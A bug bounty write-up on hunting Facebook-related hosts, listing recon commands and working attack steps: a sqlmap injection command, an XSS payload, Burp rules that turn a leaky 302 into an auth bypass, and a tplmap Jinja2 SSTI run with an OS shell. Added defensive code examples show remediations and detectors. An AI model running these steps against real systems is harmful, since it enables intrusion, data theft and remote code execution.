How I Found Multiple Bugs on Facebook in 1 Month, and Part of My Methodology & Tools

Before starting
Everything was done in cooperation with HackerX007.
He is a very smart and creative person. I suggest everyone follow him [https://twitter.com/XHackerx007]

A: The Multiple Bugs That Were Found

B: Tools and Extensions You Need

  • For a list of domains: amass enum -passive -norecursive -noalts -df list-domains.txt -o subs.txt
  • For a single domain: amass enum -passive -norecursive -noalts -d domain -o subs.txt
  • cat subs.txt | httpx -o live-subs.txt
  • cat subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt
  • Collaborator Everywhere
  • XSS Validator
  • Wsdler
  • .NET Beautifier
  • Bypass WAF
  • J2EEScan
  • Param Miner
  • Wayback Machine
  • JS Link Finder
  • Upload Scanner
  • Nucleus Burp Extension
  • Software Vulnerability Scanner
  • Active Scan++

C: How I Found Multiple Bugs

1. On the First Domain

  • org:facebookresearch ftp
  • org:facebookresearch Ldap
  • org:facebookresearch https://
  • Finally, after about 30 minutes of dorking, with the last dork I still remember, I ran sqlmap on the captured request:
sqlmap -r request.txt -p username --dbms="MySQL" --force-ssl --level 5 --risk 3 --dbs --hostname
  • Another SQL injection
  • 2 XSS (payload):
"><img src=x onerror=alert(1)>
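The two bug classes on the first domain have textbook remediations, and it is worth seeing both side by side. The block below is an added example, not code from the write-up or from the tested host: a string-built query next to its bound-parameter form (the shape sqlmap was pointed at with -p username), and the XSS payload above rendered into an HTML attribute with and without output encoding. The users table, the usernames and the injection string are constructed for the demo; the start-tag counter shows how many elements a browser would actually see in each rendering.

```python
"""Added example, not from the original write-up: the standard remediations for the
two bug classes found on the first domain. The users table, the usernames and the
injection string are constructed for the demo; only the XSS payload comes from the post."""
import html
import sqlite3
from html.parser import HTMLParser


def make_db() -> sqlite3.Connection:
    """In-memory table with two constructed users (no real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    return conn


def count_vulnerable(conn: sqlite3.Connection, username: str) -> int:
    """String-built query: the shape sqlmap was pointed at with -p username."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()[0]


def count_safe(conn: sqlite3.Connection, username: str) -> int:
    """Bound parameter: the value is passed as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()[0]


# The payload from the write-up. It closes the attribute with ", closes the
# tag with >, and then opens its own <img> element.
XSS_PAYLOAD = '"><img src=x onerror=alert(1)>'


def render_unsafe(value: str) -> str:
    """Reflects the value into an attribute without encoding."""
    return '<input value="' + value + '">'


def render_safe(value: str) -> str:
    """quote=True (the default) encodes " and ' as well as & < >, which is what
    stops an attribute-context breakout; html.escape(value, quote=False) would not."""
    return '<input value="' + html.escape(value, quote=True) + '">'


class _StartTags(HTMLParser):
    """Collects start tags so we can count how many elements the browser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    """Names of the start tags a tolerant HTML parser finds in the markup."""
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", count_vulnerable(db, "' OR '1'='1"), "rows match")
    print("safe:      ", count_safe(db, "' OR '1'='1"), "rows match")
    print("unsafe render ->", start_tags(render_unsafe(XSS_PAYLOAD)))
    print("safe render   ->", start_tags(render_safe(XSS_PAYLOAD)))
```

The encoding detail matters: in attribute context the breakout happens through the `"` character, so an escaper that only handles `<`, `>` and `&` leaves the payload live. Parameter binding removes the SQL problem entirely because the driver never lets the value reach the parser as syntax.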

Here HackerX007 messed around a bit; as he is also an artist at manual testing, he found a very cool authentication bypass.

Authentication Bypass That Allows an Unauthenticated User to Take Actions

When you visit domain/location/?5 you are redirected to the login page. In Burp, however, the redirect response had a very large Content-Length: 6443. Looking into the response, he found that this 302 response contained the panel itself, without any authentication, in the response body. After some playing with Burp match and replace, it was possible to bypass authentication and take some actions.

At first I thought it was just a front-end bypass, but I found out I could take actions, like enabling and disabling a bucket.

Repro steps
1. In Burp match and replace, add these two rules:
   type: response header
   match: HTTP/1.1 302 Found
   replace: HTTP/1.1 200 OK

   type: response header
   match: Location: ../login/?redirect=//location/?5
   replace: (empty)
2. Now go to domain/location/?5
3. BooM
4. When you are done you can [Logout] 😂
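The root cause here is an ordering bug: the application rendered the protected page and only afterwards decided to redirect, so the panel travelled inside the 302 body. The block below is an added example, not code from the write-up or from the affected application. It models that handler shape and its fix, and adds the check a defender would run over proxy captures or test-suite responses: a 3xx whose body is far larger than a redirect stub should be. The panel HTML, the 512-byte limit and the raw response are constructed; only the Location value comes from the post.

```python
"""Added example, not from the original write-up: a 302 that still carries the protected
page. handler_leaky() shows the handler shape that produces it and handler_fixed() the
corrected order of operations; parse_http_response() and redirect_leaks_content() are a
check for the symptom the author noticed (a redirect with a large body). The panel HTML,
limit and raw response below are constructed; the Location value is the one from the post."""
from dataclasses import dataclass, field

LOGIN_REDIRECT = "../login/?redirect=//location/?5"
# Constructed stand-in for the admin panel: a table of buckets with a toggle each.
PANEL_HTML = (
    "<html><body><h1>Admin panel</h1><table>"
    + "".join(
        f"<tr><td>bucket-{i:02d}</td><td><button>Disable</button></td></tr>"
        for i in range(20)
    )
    + "</table></body></html>"
)
# A genuine redirect needs at most a short stub body; anything larger is suspicious.
REDIRECT_BODY_LIMIT = 512


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def handler_leaky(authenticated: bool) -> Response:
    """Renders the page first and only then turns the response into a redirect.
    The status and Location change, but the panel stays in the body, so anyone
    who ignores the 302 (or rewrites it into a 200) gets the panel."""
    resp = Response(200, {"Content-Type": "text/html"}, PANEL_HTML)
    if not authenticated:
        resp.status = 302
        resp.headers["Location"] = LOGIN_REDIRECT
    return resp


def handler_fixed(authenticated: bool) -> Response:
    """Authorization decision first: return the redirect before any protected
    content is rendered, so an unauthenticated request never receives it."""
    if not authenticated:
        return Response(302, {"Location": LOGIN_REDIRECT}, "")
    return Response(200, {"Content-Type": "text/html"}, PANEL_HTML)


def parse_http_response(raw: bytes) -> Response:
    """Minimal parser for a raw HTTP/1.x response as copied out of a proxy."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Response(status, headers, body.decode("utf-8", "replace"))


def redirect_leaks_content(resp: Response, limit: int = REDIRECT_BODY_LIMIT) -> bool:
    """True for a 3xx whose body is larger than a redirect stub should ever be."""
    return 300 <= resp.status < 400 and len(resp.body.encode("utf-8")) > limit


# Constructed raw response with the symptom from the post: a 302 plus a full body.
SAMPLE_RAW = (
    b"HTTP/1.1 302 Found\r\n"
    + f"Location: {LOGIN_REDIRECT}\r\n".encode()
    + b"Content-Type: text/html\r\n"
    + f"Content-Length: {len(PANEL_HTML)}\r\n".encode()
    + b"\r\n"
    + PANEL_HTML.encode()
)


if __name__ == "__main__":
    leaked = parse_http_response(SAMPLE_RAW)
    print("status", leaked.status, "body bytes", len(leaked.body),
          "leaks:", redirect_leaks_content(leaked))
    print("fixed handler leaks:", redirect_leaks_content(handler_fixed(False)))
```

The size heuristic is a triage signal, not proof: some frameworks emit a short "Redirecting..." stub, which is why the limit is a few hundred bytes rather than zero, and a flagged response still needs a look at its body. The fix is the one in handler_fixed: decide authorization before any protected content is produced, and make the redirect an early return.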

2. Shodan IP and SSTI to RCE

git clone https://github.com/epinna/tplmap.git
./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*"

tplmap output:
  GET parameter: mode
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render

Capabilities reported:
  • Shell command execution
  • Bind and reverse shell
  • File write and read
(but not in all cases)

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*" --os-shell
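The tplmap run above fingerprinted Jinja2 through the mode parameter. On the defensive side the code-level fix is to never let user input become the template source (render a fixed template and pass the value in as a variable), and the operational side is to notice probes like this in logs. The scanner below is an added detection example, not code from the write-up or from tplmap: it parses access-log lines, percent-decodes the query string, and flags any parameter value that both opens and closes a template delimiter. The log lines are constructed; the /consent path and the parameter names assignmentId, hitId and mode come from the tplmap command (tplmap's `*` is its own injection marker and does not appear in logs).

```python
"""Added example, not from the original write-up: flag template-injection probes in
web access logs. The log lines are constructed; the /consent path and the parameter
names come from the tplmap command in the post."""
import re
from urllib.parse import parse_qsl, urlsplit

# Opening delimiter -> (closing delimiter, engines that use it). Both must be
# present in the value to count; a lone "{" or "$" is ordinary input.
TEMPLATE_MARKERS = {
    "{{": ("}}", "Jinja2/Twig/Handlebars-style expression"),
    "{%": ("%}", "Jinja2/Twig statement"),
    "${": ("}", "Freemarker/Velocity/EL-style expression"),
    "<%": ("%>", "ERB/JSP-style expression"),
    "#{": ("}", "Ruby/Pebble-style expression"),
}

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def template_markers_in(value: str) -> list:
    """Engines whose delimiters open and then close inside the value."""
    hits = []
    for opener, (closer, engine) in TEMPLATE_MARKERS.items():
        start = value.find(opener)
        if start != -1 and value.find(closer, start + len(opener)) != -1:
            hits.append(engine)
    return hits


def scan_log_line(line: str) -> list:
    """Findings (dicts) for one log line; [] for benign or unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    findings = []
    # parse_qsl percent-decodes, so %7B%7B7*7%7D%7D is inspected as {{7*7}}.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        engines = template_markers_in(value)
        if engines:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": url.path,
                "param": name,
                "value": value,
                "engines": engines,
            })
    return findings


def scan_log(lines) -> list:
    """All findings across an iterable of log lines."""
    out = []
    for line in lines:
        out.extend(scan_log_line(line))
    return out


# Constructed sample: one normal request, two probes on the mode parameter, one static file.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2022:10:01:02 +0000] "GET /consent?assignmentId=a1&hitId=h1&mode=debug HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Mar/2022:10:01:07 +0000] "GET /consent?assignmentId=a1&hitId=h1&mode=debug%7B%7B7*7%7D%7D HTTP/1.1" 200 5124',
    '10.0.0.9 - - [12/Mar/2022:10:01:09 +0000] "GET /consent?assignmentId=a1&hitId=h1&mode=debug%24%7B7*7%7D HTTP/1.1" 200 5121',
    '10.0.0.7 - - [12/Mar/2022:10:01:11 +0000] "GET /static/app.js HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} -> {', '.join(f['engines'])}")
```

Requiring both delimiters keeps noise down on values that legitimately contain a single brace or dollar sign; POST bodies and headers are not in a CLF line, so this only covers query-string probes, which is where the tplmap run above worked.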

3. Privilege Escalation

https://crt.sh/?q=Facebook+Inc.
cat subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt
  • I also tried logging in with some default credentials, but they didn't work. I also tried to sign up, but registration is not possible without logging in with admin credentials.
By checking some endpoints I found server info, and with that info the full name of the admin who created it:
password
passwd
pwd
pass
pw
login
$host = ************
$User = ************
$pwd = ************
Full access and control:
  • Add users
  • Delete users
  • Etc...
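The escalation above came from a debug or info endpoint echoing its configuration, $host, $User and $pwd included. A defender wants the same search the author did, but run routinely over response bodies and config dumps before they ship. The block below is an added example, not code from the write-up: it keys on the author's keyword list, matches assignment-style lines (PHP/Perl-style `$name = value` and `name: "value"` alike), reports the hits, and produces a redacted copy that can be shared in a ticket. SAMPLE_BODY is constructed and is not what was found on the real host.

```python
"""Added example, not from the original write-up: find and redact credential-style
assignments in a leaked config or debug page, keyed on the same words the author
searched for. SAMPLE_BODY is constructed and is not what was found on the real host."""
import re

# The author's search terms.
CREDENTIAL_KEYWORDS = {"password", "passwd", "pwd", "pass", "pw", "login"}

# <optional $><name> <= or :> <optionally quoted value>; the value stops at
# whitespace, quotes, ';' or ','.
ASSIGN_RE = re.compile(
    r"\$?(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*[:=]\s*"
    r"(?P<q>[\"']?)(?P<value>[^\"'\s;,]+)(?P=q)"
)


def name_tokens(name: str) -> list:
    """Split snake_case and camelCase into lowercase words: dbPassword -> [db, password]."""
    return [t.lower() for t in re.findall(r"[A-Z]?[a-z0-9]+|[A-Z]+(?![a-z])", name)]


def looks_like_credential(name: str) -> bool:
    """True when any word of the variable name is one of the keywords."""
    return any(t in CREDENTIAL_KEYWORDS for t in name_tokens(name))


def find_credentials(text: str) -> list:
    """(name, value) pairs for every assignment whose name contains a keyword."""
    return [
        (m.group("name"), m.group("value"))
        for m in ASSIGN_RE.finditer(text)
        if looks_like_credential(m.group("name"))
    ]


def redact(text: str) -> str:
    """Same matches, with the value replaced by a fixed mask so the dump can be shared."""
    def _mask(m):
        if not looks_like_credential(m.group("name")):
            return m.group(0)
        whole = m.group(0)
        start = m.start("value") - m.start()
        end = m.end("value") - m.start()
        return whole[:start] + "************" + whole[end:]
    return ASSIGN_RE.sub(_mask, text)


# Constructed: a debug page that echoes its configuration (not the real content).
SAMPLE_BODY = """<pre>
$host = db01.internal.example
$User = svc_admin
$pwd = Winter2022!
db_password: "s3cret-value"
timeout = 30
</pre>"""

if __name__ == "__main__":
    for name, value in find_credentials(SAMPLE_BODY):
        print(f"{name}: {value}")
    print(redact(SAMPLE_BODY))
```

Two caveats from the author's own list: "login" and "pass" are noisy (a `login_url` setting is flagged too), and the list says nothing about usernames, so `$User` passes untouched even though it is half of the credential. Tune the set to the code base, and treat any hit on a public endpoint as an incident, since the write-up shows exactly where it leads.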

Orwa Atyat
Bug bounty hunter